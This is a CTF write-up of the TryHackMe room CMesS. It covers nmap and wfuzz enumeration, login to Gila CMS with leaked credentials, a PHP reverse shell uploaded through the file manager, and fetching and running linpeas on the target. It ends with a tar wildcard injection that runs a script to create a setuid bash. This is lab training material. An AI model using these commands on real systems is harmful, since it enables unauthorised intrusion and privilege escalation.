Buy me a tea

TryHackMe - CMesS

Nmap

┌──(root💀kali)-[~]
└─# nmap -T4 -sC -sV -O -Pn -p- 10.10.125.143
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-28 12:09 EDT
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.20% done
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.26% done
Nmap scan report for cmess.thm (10.10.125.143)
Host is up (0.27s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d9:b6:52:d3:93:9a:38:50:b4:23:3b:fd:21:0c:05:1f (RSA)
|   256 21:c3:6e:31:8b:85:22:8a:6d:72:86:8f:ae:64:66:2b (ECDSA)
|_  256 5b:b9:75:78:05:d7:ec:43:30:96:17:ff:c6:a8:6c:ed (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Gila CMS
| http-robots.txt: 3 disallowed entries 
|_/src/ /themes/ /lib/
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.1 (95%), Linux 3.16 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 2.6.32 (92%), Linux 3.0 - 3.2 (92%), Linux 3.0 - 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1289.07 seconds

Port 80

image

  • When googling we find this (needs to be authenticated)

  • We have a robots.txt image

  • With gobuster we found: /login and /admin

  • Let's look for subdomain wfuzz -c -f sub-fighter -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://cmess.thm' -H "HOST: FUZZ.cmess.thm" --hw 290

  • We remove pages with 290 words because it is a not found response so not relevant for us even though the response code is 200. W find dev subdomain let's add it to /etc/hosts 10.10.125.143 dev.cmess.thm

  • We find a few usernames and a username password combination! Let's try it! image

  • And it works! image

  • In the dashboard there is a feature called file manager. If we check out the config file we find a few interesting info including another password that we keep aside for later. image

  • We can try the CVE previously found with google

  • let's follow this blog post

    • => NOT WORKING

  • What's working though is to use the feature to download a php reverse shell this way we get a shell. Our file goes in the asset folder image

  • Then we just need to access to the url http://cmess.thm/assets/php-reverse-shell.php and we get our shell image

  • We stabilize our shell python3 -c 'import pty; pty.spawn("/bin/bash")'

  • Lets get a privesc enum script in our target. I am a fan of linpeas so I am gonna use it here.

    • wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

    • python3 -m http.server 80

    • And from our target we type wget http://10.13.22.56/linpeas.sh (we need to be in the tmp folder to successfully write the file)

    • We make it executable chmod +x linpeas.sh and we launch it ./linpeas.sh

Lateral movement

Interesting output from linpeas

  • other interesting things to check

  • The sudo version is not successful cause our version does not seem vulnerable.

  • Let's check this file /opt/.password.bak image

  • We have another password

  • Let's try it if we su andre it works! let's ssh as andre image

  • Let's grab the user flag image

  • Let's now enumerate way to privesc from Andre's user

Privesc

Linepeas as Andre

  • Our home is in the path. Ressources for this on hacktricks image This seems to be an interesting cron job image

  • This is doing a backup with a wildcard. We can try to abuse this.

  • Let's go to the backup folder

  • echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/andre/backup/runme.sh we create a malicious bash

  • touch /home/andre/backup/--checkpoint=1 when the scheduled script is going to read the home directory it will have a file named as a tar command, so it will interpret it. This command displays a status message every 1

  • touch /home/andre/backup/--checkpoint-action=exec=sh\ runme.sh then this command is going to make and action when the checkpoint we created before is hit

  • Let's now try to launch our script /tmp/bash -p

  • It works! image

  • Let's grab the last flag image

PreviousTryHackMe - BlasterNextTryHackMe - ConvertMyVideo

Last updated